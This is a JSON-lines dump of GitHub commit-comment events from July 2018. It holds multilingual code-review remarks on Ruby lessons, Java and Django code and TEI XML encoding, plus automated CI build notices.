{"id":"8029481872","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29860598,"position":null,"line":null,"path":null,"commit_id":"8f1e10f085c61359e8b886462671642f64a53ea8","created_at":"2018-07-27T16:08:33Z","updated_at":"2018-07-27T16:08:33Z","author_association":"OWNER","body":"К стати, да, проблема. Я чёт не подумал когда копипастил. Надо попробовать придумать что-нибудь."}},"created_at":"2018-07-27T16:08:33Z"}
{"id":"8029483379","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860603,"position":1,"line":1,"path":"course_1/part_3/fibonacci.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:08:51Z","updated_at":"2018-07-27T16:08:51Z","author_association":"NONE","body":"использование однобуквенных переменных может быть оправданно разве что в случаях, когда эти названия диктует контекст задачи\r\nк примеру, если это коэффициэнты уравнения, произвольные стороны геометрической фигуры и т.п."}},"created_at":"2018-07-27T16:08:51Z"}
{"id":"8029484227","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860604,"position":1,"line":1,"path":"course_1/part_3/fibonacci.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:09:02Z","updated_at":"2018-07-27T16:09:02Z","author_association":"NONE","body":"по возможности давай полные имена переменным, не нужно сокращать\r\nполные, удачно подобранные имена, будут читаться гораздо лучше"}},"created_at":"2018-07-27T16:09:02Z"}
{"id":"8029485505","type":"CommitCommentEvent","actor":{"login":"delphij"},"repo":{"name":"libarchive/libarchive"},"payload":{"comment":{"id":29860609,"position":7,"line":707,"path":"libarchive/archive_read_support_format_lha.c","commit_id":"2c8c83b9731ff822fad6cc8c670ea5519c366a14","created_at":"2018-07-27T16:09:19Z","updated_at":"2018-07-27T16:09:19Z","author_association":"NONE","body":"LHa -> LHA?"}},"created_at":"2018-07-27T16:09:19Z"}
{"id":"8029485748","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29860610,"position":null,"line":null,"path":null,"commit_id":"b863eb6e939cb9e11beb1e4136244250725d29a3","created_at":"2018-07-27T16:09:21Z","updated_at":"2018-07-27T16:09:21Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - x86_64-MacOS-10.9-clang: OK (2948 of 2948 tests passed, 1 test warnings)\n\nMessages:\n\n * 1 test had: EIO diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T16:09:21Z"}
{"id":"8029491473","type":"CommitCommentEvent","actor":{"login":"HotOnMik"},"repo":{"name":"HotOnMik/HotOnMik"},"payload":{"comment":{"id":29860626,"position":2,"line":2,"path":"login.php","commit_id":"0ab9514d0558367c807e0a2cb10e9dfce16e65cc","created_at":"2018-07-27T16:10:35Z","updated_at":"2018-07-27T16:10:35Z","author_association":"OWNER","body":"What)"}},"created_at":"2018-07-27T16:10:35Z"}
{"id":"8029492373","type":"CommitCommentEvent","actor":{"login":"HotOnMik"},"repo":{"name":"HotOnMik/HotOnMik"},"payload":{"comment":{"id":29860627,"position":2,"line":2,"path":"login.php","commit_id":"0ab9514d0558367c807e0a2cb10e9dfce16e65cc","created_at":"2018-07-27T16:10:47Z","updated_at":"2018-07-27T16:10:47Z","author_association":"OWNER","body":"Fine"}},"created_at":"2018-07-27T16:10:47Z"}
{"id":"8029493667","type":"CommitCommentEvent","actor":{"login":"jeffbski"},"repo":{"name":"KevinAst/feature-u"},"payload":{"comment":{"id":29860630,"position":null,"line":null,"path":null,"commit_id":"0af60029176029d4cce556a7eb616f541ba24388","created_at":"2018-07-27T16:11:04Z","updated_at":"2018-07-27T16:11:04Z","author_association":"NONE","body":"k, not sure if it would make any difference anyway. If it was expecting a component to be created synchronously then it wouldn't.\r\n\r\nAlso another idea, I wonder if there is anyway to register a root component (maybe an empty one) and then later register a different root element later.\r\n"}},"created_at":"2018-07-27T16:11:04Z"}
{"id":"8029495756","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29860639,"position":22,"line":22,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T16:11:30Z","updated_at":"2018-07-27T16:11:30Z","author_association":"OWNER","body":"я пока не понимаю: если все поместить в initialize то, как потом из-вне этот маршрут извлеч? т.к. в данном алгоритме он постоянно создается заново.\r\nТ.е. менять надо и логику алгоритма? \r\nОк..подумать надо.."}},"created_at":"2018-07-27T16:11:30Z"}
{"id":"8029496717","type":"CommitCommentEvent","actor":{"login":"thoul"},"repo":{"name":"thoul/git-test"},"payload":{"comment":{"id":29860644,"position":null,"line":null,"path":null,"commit_id":"45768d0f96e83cefffdfe514efd36987c0a89b60","created_at":"2018-07-27T16:11:42Z","updated_at":"2018-07-27T16:11:42Z","author_association":"OWNER","body":"321"}},"created_at":"2018-07-27T16:11:42Z"}
{"id":"8029497952","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29860648,"position":null,"line":null,"path":null,"commit_id":"18d0e5e133e9a99fac4b532a9cd3aaf66752a526","created_at":"2018-07-27T16:11:58Z","updated_at":"2018-07-27T16:11:58Z","author_association":"MEMBER","body":"Hi, @vak2ve, the parenthetical received dates shouldn't be part of the `date` encoding.\r\n\r\nExample:\r\n```xml\r\n<dateline rendition=\"#right\">\r\n  <placeName>\r\n   <hi rend=\"smallcaps\">United States Legation,</hi>\r\n   <hi rend=\"italic\"> Vienna</hi></placeName>, \r\n   <date when=\"1870-10-03\" calendar=\"gregorian\">\r\n    <hi rend=\"italic\">October</hi> 3, 1870. (Received October 26.)</date>\r\n</dateline>\r\n```\r\n\r\nshould be:\r\n```xml\r\n<dateline rendition=\"#right\">\r\n  <placeName>\r\n   <hi rend=\"smallcaps\">United States Legation,</hi>\r\n   <hi rend=\"italic\"> Vienna</hi></placeName>, \r\n   <date when=\"1870-10-03\" calendar=\"gregorian\">\r\n    <hi rend=\"italic\">October</hi> 3, 1870</date>. (Received October 26.)</dateline>\r\n```\r\n\r\nIf we elect to add received dates in a later project stage, we will encode them separately, i.e.:\r\n```xml\r\n<dateline rendition=\"#right\">\r\n  <placeName>\r\n   <hi rend=\"smallcaps\">United States Legation,</hi>\r\n   <hi rend=\"italic\"> Vienna</hi></placeName>, \r\n   <date type=\"creation-date\" when=\"1870-10-03\" calendar=\"gregorian\">\r\n    <hi rend=\"italic\">October</hi> 3, 1870</date>. \r\n   (Received  <date when=\"1870-10-26\" type=\"received-date\" \r\n   calendar=\"gregorian\">October 26</date>.)</dateline>\r\n```\r\n\r\nI'll make the changes in frus1870 and check previously posted q3 volumes. \r\n\r\n@vak2ve, could you please encode only creation dates as `date` in the forthcoming volumes?  The quick fixes are written with this convention in mind.  Thanks!"}},"created_at":"2018-07-27T16:11:58Z"}
{"id":"8029502185","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860660,"position":6,"line":6,"path":"course_1/part_3/fibonacci.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:12:52Z","updated_at":"2018-07-27T16:12:52Z","author_association":"NONE","body":"в большинстве случаев лучше все же вызывать методы \"классическим синтаксисом\", т.е. с аргументами в скобках, это улучшает читаемость кода"}},"created_at":"2018-07-27T16:12:52Z"}
{"id":"8029502707","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29860661,"position":26,"line":26,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T16:12:58Z","updated_at":"2018-07-27T16:12:58Z","author_association":"OWNER","body":"да. попробую others убрать\r\n"}},"created_at":"2018-07-27T16:12:58Z"}
{"id":"8029504420","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860668,"position":1,"line":1,"path":"course_1/part_3/goods.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:13:20Z","updated_at":"2018-07-27T16:13:20Z","author_association":"NONE","body":"пустой хеш принято задавать так:\r\n```ruby\r\nhash = {}\r\n```"}},"created_at":"2018-07-27T16:13:20Z"}
{"id":"8029504888","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29860671,"position":31,"line":29,"path":"Lesson3/l3_class_Rout.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T16:13:26Z","updated_at":"2018-07-27T16:13:26Z","author_association":"OWNER","body":"ясно"}},"created_at":"2018-07-27T16:13:26Z"}
{"id":"8029505547","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29860673,"position":21,"line":63,"path":"QieGaoWorld/views/login.py","commit_id":"566b645ff942c0721fe1549f44a5c06bbb16ff32","created_at":"2018-07-27T16:13:35Z","updated_at":"2018-07-27T16:13:35Z","author_association":"OWNER","body":"如果filter获取到了用户 下面的逻辑全部崩溃\r\n\r\n应该统一使用objets.get 或 objets.filter"}},"created_at":"2018-07-27T16:13:35Z"}
{"id":"8029505569","type":"CommitCommentEvent","actor":{"login":"VioletaPr"},"repo":{"name":"VioletaPr/github-workflow-13"},"payload":{"comment":{"id":29860674,"position":null,"line":null,"path":null,"commit_id":"ef73cae0a7164b55a5e9dd122c6f3cf06e6233cc","created_at":"2018-07-27T16:13:35Z","updated_at":"2018-07-27T16:13:35Z","author_association":"OWNER","body":"added file2"}},"created_at":"2018-07-27T16:13:35Z"}
{"id":"8029509359","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/wvuonline"},"payload":{"comment":{"id":29860684,"position":null,"line":null,"path":null,"commit_id":"3c1436791d91de20d3277e8b8dca3e7e390725cc","created_at":"2018-07-27T16:14:24Z","updated_at":"2018-07-27T16:14:24Z","author_association":"COLLABORATOR","body":"Created multidev environment [wvuonline#ci-427](https://dashboard.pantheon.io/sites/8fb52aa5-5525-4d73-9b84-f2d86faf1da2#ci-427).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-427-wvuonline.pantheonsite.io/)"}},"created_at":"2018-07-27T16:14:24Z"}
{"id":"8029509397","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29860685,"position":null,"line":null,"path":null,"commit_id":"8f1e10f085c61359e8b886462671642f64a53ea8","created_at":"2018-07-27T16:14:24Z","updated_at":"2018-07-27T16:14:24Z","author_association":"COLLABORATOR","body":"Предлагаю сделать чуть проще. Нас ведь в основном интересует совместимость сейвов. Ну вот при чтении сейва можно проверять версию, как я со слотами делали и если наша версия, то читаем дополнительно тип и кол-во второго заряда. Если версия не наша, значит не читаем и все остается, как было. Ну а во всяких _State уже безусловно дописываем в конце эти тип и кол-во и читаем же их. m_netpk то, что за границами известного ему пакета пропускает, как есть, т.ч. проблем ни у кого быть не должно.\r\n"}},"created_at":"2018-07-27T16:14:24Z"}
{"id":"8029509645","type":"CommitCommentEvent","actor":{"login":"kanmurimori"},"repo":{"name":"kanmurimori/kanmurimori.github.io"},"payload":{"comment":{"id":29860687,"position":null,"line":null,"path":null,"commit_id":"e6d12012d931b25fe92012c21bbef0978fa4e38e","created_at":"2018-07-27T16:14:28Z","updated_at":"2018-07-27T16:14:28Z","author_association":"OWNER","body":"英用手書"}},"created_at":"2018-07-27T16:14:28Z"}
{"id":"8029510485","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29860692,"position":null,"line":null,"path":null,"commit_id":"d74ff68616e85eb14a5e1b6380d0247a5fa9c41e","created_at":"2018-07-27T16:14:38Z","updated_at":"2018-07-27T16:14:38Z","author_association":"OWNER","body":"Excellent."}},"created_at":"2018-07-27T16:14:38Z"}
{"id":"8029512774","type":"CommitCommentEvent","actor":{"login":"justiceo"},"repo":{"name":"7sco/qksms-1"},"payload":{"comment":{"id":29860700,"position":6,"line":6,"path":"presentation/src/main/java/com/moez/QKSMS/desktop/DesktopView.kt","commit_id":"a92a5e2c32857653cabcab067d19e204dac3e11b","created_at":"2018-07-27T16:15:09Z","updated_at":"2018-07-27T16:15:09Z","author_association":"COLLABORATOR","body":"Do we need this interface? Can DesktopActivity extend QKView<SettingsState> directly?"}},"created_at":"2018-07-27T16:15:09Z"}
{"id":"8029513981","type":"CommitCommentEvent","actor":{"login":"BoDaly"},"repo":{"name":"BoDaly/azure_functions"},"payload":{"comment":{"id":29860709,"position":null,"line":null,"path":null,"commit_id":"ce9fe0d0d8df032f08e5704ef510f094e558b4fb","created_at":"2018-07-27T16:15:23Z","updated_at":"2018-07-27T16:15:23Z","author_association":"OWNER","body":"This should read:\r\nupdate index.js\r\n-better visibility\r\n\r\n-better log for Resolve."}},"created_at":"2018-07-27T16:15:23Z"}
{"id":"8029514058","type":"CommitCommentEvent","actor":{"login":"difuer-yl"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29860711,"position":21,"line":63,"path":"QieGaoWorld/views/login.py","commit_id":"566b645ff942c0721fe1549f44a5c06bbb16ff32","created_at":"2018-07-27T16:15:24Z","updated_at":"2018-07-27T16:15:24Z","author_association":"COLLABORATOR","body":"这是你写的好吗。。而且后面都更新多少了，你给我说这个"}},"created_at":"2018-07-27T16:15:24Z"}
{"id":"8029514792","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860715,"position":5,"line":5,"path":"course_1/part_3/goods.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:15:33Z","updated_at":"2018-07-27T16:15:33Z","author_association":"NONE","body":"`do` здесь не нужен"}},"created_at":"2018-07-27T16:15:33Z"}
{"id":"8029515563","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29860719,"position":null,"line":null,"path":null,"commit_id":"403ccdea1e510dd03eedfdaf07b3a83f5e9f5d1e","created_at":"2018-07-27T16:15:44Z","updated_at":"2018-07-27T16:15:44Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-72](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-72).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-72-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-27T16:15:44Z"}
{"id":"8029516302","type":"CommitCommentEvent","actor":{"login":"oldratlee"},"repo":{"name":"alibaba/transmittable-thread-local"},"payload":{"comment":{"id":29860721,"position":21,"line":14,"path":"src/main/java/com/alibaba/ttl/threadpool/agent/TtlAgent.java","commit_id":"4863568e26dfb3c642bd2caef43b9f71950d7410","created_at":"2018-07-27T16:15:54Z","updated_at":"2018-07-27T16:15:54Z","author_association":"MEMBER","body":"怎么删除了 类的JavaDoc了？"}},"created_at":"2018-07-27T16:15:54Z"}
{"id":"8029517997","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860726,"position":7,"line":7,"path":"course_1/part_3/goods.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:16:16Z","updated_at":"2018-07-27T16:16:16Z","author_association":"NONE","body":"\"даункейс\" - лишний\r\nвот смотри:\r\n```\r\n$ irb\r\n2.5.1 :001 > 'AABBcccDe'.capitalize\r\n => \"Aabbcccde\"\r\n```\r\n\"капиталайз\" вполне справляется"}},"created_at":"2018-07-27T16:16:16Z"}
{"id":"8029519025","type":"CommitCommentEvent","actor":{"login":"oldratlee"},"repo":{"name":"alibaba/transmittable-thread-local"},"payload":{"comment":{"id":29860729,"position":18,"line":14,"path":"src/main/java/com/alibaba/ttl/threadpool/agent/TtlAgent.java","commit_id":"4863568e26dfb3c642bd2caef43b9f71950d7410","created_at":"2018-07-27T16:16:29Z","updated_at":"2018-07-27T16:16:29Z","author_association":"MEMBER","body":"怎么删除类的 `final`修饰了？ @xwshiustc "}},"created_at":"2018-07-27T16:16:29Z"}
{"id":"8029521720","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860736,"position":10,"line":10,"path":"course_1/part_3/goods.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:17:03Z","updated_at":"2018-07-27T16:17:03Z","author_association":"NONE","body":"здесь лучше с постфиксным \"иф\" (см. комментарий в задаче про дату)"}},"created_at":"2018-07-27T16:17:03Z"}
{"id":"8029522082","type":"CommitCommentEvent","actor":{"login":"oldratlee"},"repo":{"name":"alibaba/transmittable-thread-local"},"payload":{"comment":{"id":29860737,"position":65,"line":47,"path":"src/main/java/com/alibaba/ttl/threadpool/agent/TtlAgent.java","commit_id":"4863568e26dfb3c642bd2caef43b9f71950d7410","created_at":"2018-07-27T16:17:08Z","updated_at":"2018-07-27T16:17:08Z","author_association":"MEMBER","body":"怎么调整空白了？ @xwshiustc  😃"}},"created_at":"2018-07-27T16:17:08Z"}
{"id":"8029522339","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29860738,"position":null,"line":null,"path":null,"commit_id":"1c8e61d5d63a51ae09bed7448195e9a411e8bc3d","created_at":"2018-07-27T16:17:11Z","updated_at":"2018-07-27T16:17:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [clean_dateobject_to_string](https://trello.com/c/MHqtboKE/49-cleandateobjecttostring)"}},"created_at":"2018-07-27T16:17:11Z"}
{"id":"8029523009","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29860740,"position":null,"line":null,"path":null,"commit_id":"9c8e2e86b95868310db321bd3a19595029a648c6","created_at":"2018-07-27T16:17:19Z","updated_at":"2018-07-27T16:17:19Z","author_association":"OWNER","body":"Yes, this is what we want, at the right layer.\r\n\r\nThe reason to use Lens is that we can add more instances. So we can have some kind of `PrintingInformation` data-structure that contains a `ChunkDB` as well as other needed information -- and we don't need to change the printing code when we do so."}},"created_at":"2018-07-27T16:17:19Z"}
{"id":"8029529581","type":"CommitCommentEvent","actor":{"login":"giselyalves13"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29860754,"position":6,"line":6,"path":"app/models/user.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-27T16:18:44Z","updated_at":"2018-07-27T16:18:44Z","author_association":"OWNER","body":"O bcrypt não faz isso? \r\n"}},"created_at":"2018-07-27T16:18:44Z"}
{"id":"8029530370","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29860756,"position":6,"line":63,"path":"QieGaoWorld/views/login.py","commit_id":"67dfb524c46fd720222da8fb3c11b335f41fcfe3","created_at":"2018-07-27T16:18:54Z","updated_at":"2018-07-27T16:18:54Z","author_association":"OWNER","body":"既然用get了就不要用len了\r\n致命错误：忘记except不存在的情况和返回多个元素的情况\r\n"}},"created_at":"2018-07-27T16:18:54Z"}
{"id":"8029530816","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860758,"position":28,"line":28,"path":"course_1/part_3/goods.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:18:59Z","updated_at":"2018-07-27T16:18:59Z","author_association":"NONE","body":"здесь лучше придерживаться одной стратегии\r\nлибо всю сроку составлять с помощью канкатенации\r\nлибо использовать экстраполяцию\r\nи то и другое как-то усложняет восприятие"}},"created_at":"2018-07-27T16:18:59Z"}
{"id":"8029531431","type":"CommitCommentEvent","actor":{"login":"belph"},"repo":{"name":"belph/rosette-api-java"},"payload":{"comment":{"id":29860761,"position":null,"line":null,"path":null,"commit_id":"2ba9dc1033530bdd2fbb60980a5f63e21d785eb1","created_at":"2018-07-27T16:19:06Z","updated_at":"2018-07-27T16:19:06Z","author_association":"OWNER","body":"@iredpath Yeah, I'm not sure what the best approach is either. @guruxu may want to weigh in on the best approach"}},"created_at":"2018-07-27T16:19:06Z"}
{"id":"8029534016","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29860766,"position":null,"line":null,"path":null,"commit_id":"529a5b76ccf440d13e09bc12d2b7abbb9c30d851","created_at":"2018-07-27T16:19:38Z","updated_at":"2018-07-27T16:19:38Z","author_association":"OWNER","body":"With template argument I can pass lambda which can capture whatever it wants and that's waht I was thinking"}},"created_at":"2018-07-27T16:19:38Z"}
{"id":"8029535840","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860768,"position":21,"line":21,"path":"course_1/part_3/months_and_days.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:20:02Z","updated_at":"2018-07-27T16:20:02Z","author_association":"NONE","body":"`to_s` лишний, \"путс\" сам вызывает приведение к строке"}},"created_at":"2018-07-27T16:20:02Z"}
{"id":"8029540729","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29860776,"position":106,"line":358,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T16:21:03Z","updated_at":"2018-07-27T16:21:03Z","author_association":"MEMBER","body":"Don't forget flush here too"}},"created_at":"2018-07-27T16:21:03Z"}
{"id":"8029541718","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860778,"position":21,"line":21,"path":"course_1/part_3/months_and_days.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:21:15Z","updated_at":"2018-07-27T16:21:15Z","author_association":"NONE","body":"лучше эти два блока (16 - 18 строки и 20 - 22) свести к одному - это несложно\r\nво-первых меньше кода\r\nво-вторых не придется делать итерацию по второй коллекции"}},"created_at":"2018-07-27T16:21:15Z"}
{"id":"8029542699","type":"CommitCommentEvent","actor":{"login":"justiceo"},"repo":{"name":"7sco/qksms-1"},"payload":{"comment":{"id":29860781,"position":33,"line":33,"path":"presentation/src/main/java/com/moez/QKSMS/desktop/DesktopActivity.kt","commit_id":"a92a5e2c32857653cabcab067d19e204dac3e11b","created_at":"2018-07-27T16:21:27Z","updated_at":"2018-07-27T16:21:27Z","author_association":"COLLABORATOR","body":"WebActivity would sound better in my opinion"}},"created_at":"2018-07-27T16:21:27Z"}
{"id":"8029543451","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29860782,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-27T16:21:37Z","updated_at":"2018-07-27T16:21:37Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-27T16:21:37Z"}
{"id":"8029547240","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29860787,"position":99,"line":351,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T16:22:22Z","updated_at":"2018-07-27T16:22:22Z","author_association":"MEMBER","body":"Huuh, why are you rejecting a session on discussion when the type is `ACCEPT_SESSION_ON_DISCUSSION`?"}},"created_at":"2018-07-27T16:22:22Z"}
{"id":"8029547795","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860788,"position":9,"line":9,"path":"course_1/part_3/vowels.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:22:29Z","updated_at":"2018-07-27T16:22:29Z","author_association":"NONE","body":"в руби рекомендуется использовать встроенные итераторы семейства `each`, вместо петлей `loop`, `while` или `for` там, где это приемлимо и удобно"}},"created_at":"2018-07-27T16:22:29Z"}
{"id":"8029549814","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29860793,"position":null,"line":null,"path":null,"commit_id":"803490273e465e776469f81e1f1863408eeffb7c","created_at":"2018-07-27T16:22:51Z","updated_at":"2018-07-27T16:22:51Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 201](https://teamcity.otenv.com/viewLog.html?buildId=9017456&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-27T16:22:51Z"}
{"id":"8029550716","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29860796,"position":9,"line":9,"path":"course_1/part_3/vowels.rb","commit_id":"5e12b79ff77009cbf2e31c60017895aa6d519e8b","created_at":"2018-07-27T16:23:02Z","updated_at":"2018-07-27T16:23:02Z","author_association":"NONE","body":"стараются не использовать переменные для индекса с \"ручным управлением\"\r\n\r\nпредпочтение отдается использованию \"специальных методов\": [each_with_index](https://ruby-doc.org/core-2.5.1/Enumerable.html#method-i-each_with_index) или [each.with_index(n)](https://ruby-doc.org/core-2.5.1/Enumerator.html#method-i-with_index)\r\n\r\nпро использование второго из этих методов можно почитать к примеру в ответе на [вопрос про each.with_index(n) на СО](https://stackoverflow.com/questions/20258086/difference-between-each-with-index-and-each-with-index-in-ruby)"}},"created_at":"2018-07-27T16:23:02Z"}
{"id":"8029550729","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29860797,"position":null,"line":null,"path":null,"commit_id":"18d0e5e133e9a99fac4b532a9cd3aaf66752a526","created_at":"2018-07-27T16:23:02Z","updated_at":"2018-07-27T16:23:02Z","author_association":"MEMBER","body":"@vak2ve, looking the 178 `date` containing \"[Rr]eceived\", I wonder: did these issues come in from the vendor?  "}},"created_at":"2018-07-27T16:23:02Z"}
{"id":"8029553369","type":"CommitCommentEvent","actor":{"login":"songy23"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29860807,"position":11,"line":21,"path":"contrib/zpages/src/main/java/io/opencensus/contrib/zpages/Style.java","commit_id":"f987af8eafced461f40997785d1735976131165f","created_at":"2018-07-27T16:23:36Z","updated_at":"2018-07-27T16:23:36Z","author_association":"NONE","body":"Awesome! To fix this warning, simply put a private constructor like:\r\n```java\r\nprivate Style() {}\r\n```\r\nThen you should be able to remove `@SuppressWarnings(\"PrivateConstructorForUtilityClass\")`. This is because `Style.java` only contains static members and should not be instantiated."}},"created_at":"2018-07-27T16:23:36Z"}
{"id":"8029554166","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29860808,"position":null,"line":null,"path":null,"commit_id":"803490273e465e776469f81e1f1863408eeffb7c","created_at":"2018-07-27T16:23:47Z","updated_at":"2018-07-27T16:23:47Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 201](https://teamcity.otenv.com/viewLog.html?buildId=9017456&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:00:56"}},"created_at":"2018-07-27T16:23:47Z"}
{"id":"8029586776","type":"CommitCommentEvent","actor":{"login":"guruxu"},"repo":{"name":"belph/rosette-api-java"},"payload":{"comment":{"id":29860875,"position":null,"line":null,"path":null,"commit_id":"2ba9dc1033530bdd2fbb60980a5f63e21d785eb1","created_at":"2018-07-27T16:31:02Z","updated_at":"2018-07-27T16:31:02Z","author_association":"NONE","body":"I'll defer to Hannah on the breaking field renaming.\r\n\r\nHow many dimensions per token?\r\nDo you really need to return a list of tokens? How about `Map<MentionOffsets, List<Double>>`?\r\n"}},"created_at":"2018-07-27T16:31:02Z"}
